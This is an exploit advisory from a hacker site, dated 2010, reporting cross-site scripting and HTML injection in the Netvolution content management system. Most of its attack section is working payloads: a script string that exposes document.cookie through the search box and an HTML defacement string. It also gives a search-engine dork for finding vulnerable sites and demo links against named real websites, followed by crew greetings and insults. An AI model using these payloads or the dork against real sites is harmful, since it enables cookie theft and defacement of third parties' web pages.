Netvolution Content Management System XSS/HTML Injection Vul
Posted on 29 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Netvolution Content Management System XSS/HTML Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================================== Netvolution Content Management System XSS/HTML Injection Vulnerability ====================================================================== [+]Title Netvolution Content Management System XSS/HTML Injection Vulnerability [+]Author **RoAd_KiLlEr** [+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws [+]Tested on Win Xp Sp 2/3 --------------------------------------------------------------------------- [~] Founded by **RoAd_KiLlEr** [~] Team: Albanian Hacking Crew [~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws [~] Home: http://a-h-crew.net [~] Download App: http://www.netvolution.net/en/Netvolution-Content-Management-System [~] Vendor: http://www.netvolution.net/ ==========ExPl0iT3d by **RoAd_KiLlEr**========== [+] Dork: allinurl:default.asp?pid= "la=" ========================================== [+]. XSS Vulnerability =+=+=+=+=+=+=+=+=+ Go to any website and in the search box (its on top of webpage) put this code : "><script>alert(document.cookie)</script> Dem0: ~~~~~ http://www.grnet.gr/default.asp?pid=85&la=2 [+]. HTML Injection =+=+=+=+=+=+=+=+=+ This script is also Vulnerable to HTML Injection For HTML injection Just put this code in the search Box : ">><marquee><h1><font color=Red size=16>XSS by **RoAd_KiLlEr**</font></h1><marquee> Dem0: ~~~~~ http://lerosmarina.gr/?option=contents&task=Search&lang=en&query=Search%22%3E%3E%3Cmarquee%3E%3Ch1%3E%3Cfont+color%3DRed+size%3D16%3EXSS+by+%2A%2ARoAd_KiLlEr%2A%2A%3C%2Ffont%3E%3C%2Fh1%3E%3Cmarquee%3E Or http://www.grnet.gr/default.asp?pid=85&la=2 =========================================================================================== [!] Albanian Hacking Crew =========================================================================================== [!] **RoAd_KiLlEr** Says: Fuck You EraGon,Fuck Dark Hackers Team & Mos u shti me baben se baba ta qin nanen ;) =========================================================================================== [!] MaiL: sukihack[at]gmail[dot]com =========================================================================================== [!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers =========================================================================================== [!] Spec Th4nks: Inj3ct0r.com | indoushka from Dz-Ghost Team | Sniper Hail | NEO from DATA ir Security Group | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friends =========================================================================================== [!] Red n'black i dress eagle on my chest It's good to be an ALBANIAN Keep my head up high for that flag I die Im proud to be an ALBANIAN =========================================================================================== # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
